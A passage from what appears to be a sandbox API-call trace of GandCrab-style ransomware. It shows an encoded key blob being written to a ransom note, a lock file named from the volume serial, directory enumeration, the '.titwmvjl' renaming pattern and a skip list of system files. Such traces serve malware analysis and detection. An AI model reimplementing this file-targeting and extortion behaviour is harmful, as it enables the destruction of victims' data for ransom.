b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0086.111] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0086.112] CloseHandle (hObject=0x2c4) returned 1 [0086.112] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.113] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.113] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1f, wMilliseconds=0x1b0)) [0086.113] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.113] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.113] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.114] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a09d2ca4deb61a.lock") returned 82 [0086.114] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\sun\\java\\deployment\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0086.114] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.114] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.115] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\") returned 58 [0086.115] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0086.115] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503578 [0086.115] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.115] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0086.116] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.116] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.116] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0086.116] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0086.116] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0086.116] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a09d2ca4deb61a.lock" [0086.116] lstrlenW (lpString=".titwmvjl") returned 9 [0086.116] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a09d2ca4deb61a.lock") returned 82 [0086.116] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.116] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 91 [0086.116] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\d2ca4a09d2ca4deb61a.lock") returned 82 [0086.116] lstrlenW (lpString=".lock") returned 5 [0086.116] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.116] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0086.117] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.117] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.117] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0086.117] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0086.117] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0086.117] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\TITWMVJL-DECRYPT.txt" [0086.117] lstrlenW (lpString=".titwmvjl") returned 9 [0086.117] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\TITWMVJL-DECRYPT.txt") returned 78 [0086.117] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.117] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 87 [0086.117] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\TITWMVJL-DECRYPT.txt") returned 78 [0086.117] lstrlenW (lpString=".txt") returned 4 [0086.117] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.117] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0086.117] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0086.118] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.118] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\TITWMVJL-DECRYPT.txt") returned 78 [0086.118] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\Deployment\\TITWMVJL-DECRYPT.txt") returned 78 [0086.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0086.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0086.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0086.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0086.118] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.118] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0086.118] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0086.119] CloseHandle (hObject=0x2c4) returned 1 [0086.119] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0086.119] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0086.119] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0086.119] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\TITWMVJL-DECRYPT.txt" [0086.119] lstrlenW (lpString=".titwmvjl") returned 9 [0086.119] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\TITWMVJL-DECRYPT.txt") returned 67 [0086.119] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.119] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 76 [0086.119] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\TITWMVJL-DECRYPT.txt") returned 67 [0086.119] lstrlenW (lpString=".txt") returned 4 [0086.119] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.119] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0086.119] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0086.119] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.120] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\TITWMVJL-DECRYPT.txt") returned 67 [0086.120] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\TITWMVJL-DECRYPT.txt") returned 67 [0086.120] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.120] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.120] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0086.120] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.120] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0086.120] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.120] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0086.120] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0086.120] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.120] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0086.120] FindClose (in: hFindFile=0x5034f8 | out: hFindFile=0x5034f8) returned 1 [0086.121] CloseHandle (hObject=0x2bc) returned 1 [0086.121] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0086.121] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0086.121] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0086.121] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\TITWMVJL-DECRYPT.txt" [0086.121] lstrlenW (lpString=".titwmvjl") returned 9 [0086.121] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\TITWMVJL-DECRYPT.txt") returned 62 [0086.121] VirtualAlloc (lpAddress=0x0, dwSize=0xbc, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.121] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 71 [0086.121] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\TITWMVJL-DECRYPT.txt") returned 62 [0086.121] lstrlenW (lpString=".txt") returned 4 [0086.121] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.121] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0086.122] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0086.122] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.122] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\TITWMVJL-DECRYPT.txt") returned 62 [0086.122] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\TITWMVJL-DECRYPT.txt") returned 62 [0086.122] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.122] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.122] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0086.122] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.122] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", 